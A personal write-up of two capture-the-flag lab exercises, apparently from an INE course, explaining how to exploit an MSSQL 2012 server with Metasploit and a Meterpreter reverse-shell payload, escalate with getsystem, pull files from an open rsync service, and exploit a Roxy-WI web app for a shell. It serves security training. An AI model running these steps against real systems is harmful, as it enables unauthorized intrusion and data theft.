---

CTF 1

Question 1

Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.

Firstly, let's run an Nmap scan. We can see that an mssql 2012 server is open on port 1433. We can search in Metasploit for mssql 2012. We will use the exploit module mssql_clr_payload. We need to now change the payload to a 64-bit payload:

set payload windows/x64/meterpreter/reverse_tcp

Now that we have a meterpreter session, let's open up a shell and navigate to the root of the C: drive. Now list out the files and we have our first flag.

Question 2

Locate the second flag within the Windows configuration folder.

Navigate to C:\Windows\System32 and then to list out only the directories, use dir /a:d to do so. We do not have privileges to access the config folder. Let's terminate the session and head back to our meterpreter session and then list out our privileges with getprivs.

Since we have the SeImpersonatePrivilege privilege, we can run the command getsystem to elevate our privileges. Now let's open up another shell and access the config folder to get the flag.

Question 3

The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.

To search through the system directory for text files:

dir C:\Windows\System32\*.txt /s /b

This will only show the text files that are there. We can then copy the file path to the file EscalatePrivilageToGetThisFlag.txt file and view the contents with:

type C:\Windows\System32\drivers\etc\EscaltePrivilageToGetThisFlag.txt

Question 4

Investigate the Administrator directory to find the fourth flag.

Now let’s navigate to the C:\Users\Administrator\Desktop to find the last flag.

---

CTF 2

Question 1

Enumerate the open port using Metasploit, and inspect the RSYNC banner closely; it might reveal something interesting.

The wording is very misleading. Do not use Metasploit to enumerate anything as there are no Metasploit modules to help with this section. Firstly, lets perform an Nmap scan. We can see that rsync is running on port 873. Let attempt to connect to the rsync service:

rsync rsync://target1.ine.local/

Question 2

The files on the RSYNC server hold valuable information. Explore the contents to find the flag.

We can see from the command we have just run that there is a module called backupwscohen. We can check or view the contents of it by running the previous command followed by the module:

rsync rsync://target1.ine.local/backupwscohen/

We can see that there are 2 files. We can download them to our machine using:

rsync -a rsync://target1.ine.local/backupwscohen/ .

The flag -a will be using archive mode to preserve the file properties. The period at the end will download it to the current directory. Then cat out the contents of each file to find the flag.

Question 3

Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local.

Now, lets load up Metasploit and run an Nmap scan to see what ports are open. We can see that an Apache httpd server is running on port 80 and 443. Let's run the Nmap -sC option to enumerate more information. We could also open the web server within Firefox. We can see that Roxy-WI is running.

Let's search for a Roxy-WI module within Metasploit and use the exploit module. Once it has executed, let's open up a shell and type in /bin/bash -i to spawn a bash shell. Then let's navigate to the root directory and list out the contents to find the flag.

Question 4

Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag.

Since we know that Cron jobs are located in the /etc directory, let's navigate to there and list out the contents. There are two directories that are Cron related - however, we are only interested in the cron.d directory. Let's cat out the contents of all the files to find the last flag.

---

That’s it for this section. Next one up is the exploitation section.

— Hmad